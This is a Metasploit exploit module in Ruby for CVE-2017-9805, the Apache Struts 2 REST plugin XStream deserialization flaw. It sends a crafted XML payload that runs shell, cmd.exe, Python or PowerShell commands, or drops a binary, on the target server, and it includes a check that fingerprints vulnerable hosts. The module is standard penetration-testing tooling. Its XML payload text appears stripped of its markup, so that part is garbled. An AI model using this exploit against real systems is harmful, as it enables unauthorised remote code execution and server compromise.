## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager include Msf::Exploit::Powershell def initialize(info = {}) super( update_info( info, 'Name' => 'Apache Struts 2 REST Plugin XStream RCE', 'Description' => %q{ Apache Struts versions 2.1.2 - 2.3.33 and Struts 2.5 - Struts 2.5.12, using the REST plugin, are vulnerable to a Java deserialization attack in the XStream library. }, 'Author' => [ 'Man Yue Mo', # Vulnerability discovery 'wvu' # Metasploit module ], 'References' => [ ['CVE', '2017-9805'], ['URL', 'https://struts.apache.org/docs/s2-052.html'], ['URL', 'https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement'], ['URL', 'https://github.com/mbechler/marshalsec'] ], 'DisclosureDate' => '2017-09-05', 'License' => MSF_LICENSE, 'Platform' => ['unix', 'python', 'linux', 'win'], 'Arch' => [ARCH_CMD, ARCH_PYTHON, ARCH_X86, ARCH_X64], 'Privileged' => false, 'Targets' => [ [ 'Unix (In-Memory)', 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_memory ], [ 'Windows (In-Memory)', 'Platform' => 'win', 'Arch' => ARCH_CMD, 'Type' => :win_memory ], [ 'Python (In-Memory)', 'Platform' => 'python', 'Arch' => ARCH_PYTHON, 'Type' => :py_memory ], [ 'PowerShell (In-Memory)', 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :psh_memory ], [ 'Linux (Dropper)', 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :linux_dropper ], [ 'Windows (Dropper)', 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :win_dropper ] ], 'DefaultTarget' => 0, 'Notes' => { 'Reliability' => UNKNOWN_RELIABILITY, 'Stability' => UNKNOWN_STABILITY, 'SideEffects' => UNKNOWN_SIDE_EFFECTS } ) ) register_options([ Opt::RPORT(8080), OptString.new('TARGETURI', [true, 'Path to Struts action', '/struts2-rest-showcase/orders/3']) ]) end def check return CheckCode::Appears if execute_command(rand_str) CheckCode::Safe end def exploit case target['Type'] when /memory/ execute_command(payload.encoded) when /dropper/ execute_cmdstager end end def execute_command(cmd, opts = {}) cmd = case target['Type'] when :unix_memory, :linux_dropper %W{/bin/sh -c #{cmd}} when :py_memory %W{python -c #{cmd}} when :psh_memory if payload cmd_psh_payload( cmd, payload.arch.first, remove_comspec: true, encode_final_payload: true ).split else %W{powershell.exe -c #{cmd}} end when :win_memory, :win_dropper %W{cmd.exe /c #{cmd}} end # Encode each command argument with XML entities cmd.map! { |arg| arg.encode(xml: :text) } res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path), 'ctype' => 'application/xml', 'data' => xstream_payload(cmd) ) return false unless check_response(res) true end # java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.XStream ImageIO def xstream_payload(cmd) # XXX: and need to be removed for Windows <<~EOF 0 false 0 #{cmd.join('')} false java.lang.ProcessBuilder start

#{rand_str} #{rand_str} false 0 0 false false 0 EOF end def check_response(res) res && res.code == 500 && res.body.include?(error_string) end def error_string 'java.lang.String cannot be cast to java.security.Provider$Service' end def rand_str Rex::Text.rand_text_alphanumeric(8..42) end end